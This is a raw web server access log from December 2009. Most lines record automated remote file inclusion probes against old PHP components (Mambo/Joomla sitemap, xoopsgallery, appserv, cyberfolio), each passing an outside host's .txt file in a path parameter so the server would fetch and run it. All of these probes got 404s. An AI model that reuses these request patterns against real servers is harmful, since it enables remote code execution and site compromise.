65.18.192.91 - - [14/Dec/2009:13:11:32 -0800] "GET /logs/access_090430.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:11:38 -0800] "GET /logs/access_091201.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:11:42 -0800] "GET /logs/access_090319.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:11:42 -0800] "GET /logs/access_081102.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:11:43 -0800] "GET /logs/access_080521.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:11:43 -0800] "GET /logs/access_081110.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:11:43 -0800] "GET /logs/access_081210.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:11:43 -0800] "GET /logs/access_080525.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:11:51 -0800] "GET /logs/access_080607.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:11:51 -0800] "GET /logs/access_081123.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:11:51 -0800] "GET /logs/access_080522.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:11:55 -0800] "GET /logs/access_091118.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:11:55 -0800] "GET /logs/access_080820.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:11:55 -0800] "GET /logs/access_081119.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:11:56 -0800] "GET /logs/access_090403.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:12:00 -0800] "GET /logs/access_090330.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:12:00 -0800] "GET /logs/access_080526.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:12:03 -0800] "GET /logs/access_081123.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:12:03 -0800] "GET /logs/access_080607.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:12:03 -0800] "GET /logs/access_080522.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:12:04 -0800] "GET /logs/access_090913.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:12:07 -0800] "GET /logs/access_091118.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:12:07 -0800] "GET /logs/access_081119.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:12:07 -0800] "GET /logs/access_080820.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:12:07 -0800] "GET /logs/access_090403.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:12:10 -0800] "GET /logs/access_080526.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:12:10 -0800] "GET /logs/access_090330.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:12:14 -0800] "GET /logs/access_090913.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:12:27 -0800] "GET /logs/access_080523.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:12:32 -0800] "GET /logs/access_090315.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:12:36 -0800] "GET /logs/access_080523.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:12:40 -0800] "GET /logs/access_090315.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.122.141.47 - - [14/Dec/2009:13:12:54 -0800] "GET /logs/access_090326.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.122.141.47 - - [14/Dec/2009:13:12:54 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.122.141.47 - - [14/Dec/2009:13:12:54 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.122.141.47 - - [14/Dec/2009:13:12:55 -0800] "GET /logs/access_090326.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.122.141.47 - - [14/Dec/2009:13:12:55 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.122.141.47 - - [14/Dec/2009:13:12:55 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:12:58 -0800] "GET /logs/access_081011.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:12:58 -0800] "GET /logs/access_081001.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:13:06 -0800] "GET /logs/access_081011.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:13:06 -0800] "GET /logs/access_081001.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:13:07 -0800] "GET /logs/access_090411.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:13:09 -0800] "GET /logs/access_081028.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:13:10 -0800] "GET /logs/access_090325.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:13:13 -0800] "GET /logs/access_090302.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:13:14 -0800] "GET /logs/access_080606.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:13:14 -0800] "GET /logs/access_090415.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:13:14 -0800] "GET /logs/access_080928.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:13:15 -0800] "GET /logs/access_090411.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:13:18 -0800] "GET /logs/access_081028.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:13:19 -0800] "GET /logs/access_080531.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:13:19 -0800] "GET /logs/access_090325.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:13:21 -0800] "GET /logs/access_090302.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:13:21 -0800] "GET /logs/access_080606.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:13:21 -0800] "GET /logs/access_090415.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:13:21 -0800] "GET /logs/access_080928.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:13:29 -0800] "GET /logs/access_080531.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:13:29 -0800] "GET /logs/access_090219.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:13:30 -0800] "GET /logs/access_081109.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:13:40 -0800] "GET /logs/access_090219.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:13:41 -0800] "GET /logs/access_081109.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.124.224.98 - - [14/Dec/2009:13:13:41 -0800] "GET /appserv/main.php?appserv_root=http://www.sh-zrwl.com/info.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.141.47 - - [14/Dec/2009:13:13:43 -0800] "GET /logs/access_080518.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:13:46 -0800] "GET /logs/access_090111.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:13:58 -0800] "GET /logs/access_090111.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.122.141.47 - - [14/Dec/2009:13:14:04 -0800] "GET /logs/access_080518.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:14:32 -0800] "GET /logs/access_090119.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:14:43 -0800] "GET /logs/access_080712.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:14:43 -0800] "GET /logs/access_090713.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:14:48 -0800] "GET /logs/access_090527.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:14:49 -0800] "GET /logs/access_090610.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.124.224.98 - - [14/Dec/2009:13:14:50 -0800] "GET /logs/access_090917.log//main.php?appserv_root=http://www.sh-zrwl.com/info.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
64.124.224.98 - - [14/Dec/2009:13:14:50 -0800] "GET /logs//main.php?appserv_root=http://www.sh-zrwl.com/info.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:14:52 -0800] "GET /logs/access_090710.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:14:55 -0800] "GET /logs/access_080614.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:14:56 -0800] "GET /logs/access_090119.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:14:58 -0800] "GET /logs/access_080819.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:14:59 -0800] "GET /logs/access_081008.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.124.224.98 - - [14/Dec/2009:13:15:15 -0800] "GET /logs/access_090918.log//main.php?appserv_root=http://www.sh-zrwl.com/info.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:15:37 -0800] "GET /logs/access_080712.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:15:37 -0800] "GET /logs/access_090713.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:15:42 -0800] "GET /logs/access_090527.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:15:42 -0800] "GET /logs/access_090610.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:15:46 -0800] "GET /logs/access_090710.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [14/Dec/2009:13:15:52 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.1" 200 727834 "-" "-" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:15:52 -0800] "GET /logs/access_080614.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:15:54 -0800] "GET /logs/access_080819.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:15:55 -0800] "GET /logs/access_081008.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.237 - - [14/Dec/2009:13:16:07 -0800] "GET /blog/index.php/category/motorcycles/page/2/ HTTP/1.0" 200 20758 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
91.121.181.60 - - [14/Dec/2009:13:16:25 -0800] "GET /MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:13:16:25 -0800] "GET /logs/access_081130.log%20%20//MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:13:16:25 -0800] "GET /logs//MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:13:16:25 -0800] "GET /logs/access_080524.log%20%20//MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:13:16:27 -0800] "GET /MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:13:16:27 -0800] "GET /logs/access_081130.log%20%20//MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:13:16:27 -0800] "GET /logs//MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:13:16:27 -0800] "GET /logs/access_080524.log%20%20//MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.124.224.98 - - [14/Dec/2009:13:16:54 -0800] "GET /logs/access_090917.log//appserv/main.php?appserv_root=http://www.sh-zrwl.com/info.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:13:16:55 -0800] "GET /logs/access_081130.log//MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:13:16:55 -0800] "GET /logs/access_081130.log//MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.124.224.98 - - [14/Dec/2009:13:16:55 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.sh-zrwl.com/info.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:13:16:55 -0800] "GET /logs/access_080524.log//MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:13:16:55 -0800] "GET /logs/access_080524.log//MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.124.224.98 - - [14/Dec/2009:13:17:15 -0800] "GET /logs/access_090918.log//appserv/main.php?appserv_root=http://www.sh-zrwl.com/info.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
81.191.133.141 - - [14/Dec/2009:13:18:19 -0800] "GET /cyberfolio/portfolio/msg/view.php?av=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
81.191.133.141 - - [14/Dec/2009:13:18:19 -0800] "GET /logs//cyberfolio/portfolio/msg/view.php?av=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
81.191.133.141 - - [14/Dec/2009:13:18:20 -0800] "GET /logs/access_081001.log%20%20//cyberfolio/portfolio/msg/view.php?av=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
81.191.133.141 - - [14/Dec/2009:13:18:20 -0800] "GET /logs/access_080215.log%20%20//cyberfolio/portfolio/msg/view.php?av=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.32 - - [14/Dec/2009:13:18:33 -0800] "GET /logs/access_080525.log HTTP/1.0" 200 2803358 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.32 - - [14/Dec/2009:13:18:59 -0800] "GET /logs/access_080706.log HTTP/1.0" 200 3325038 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
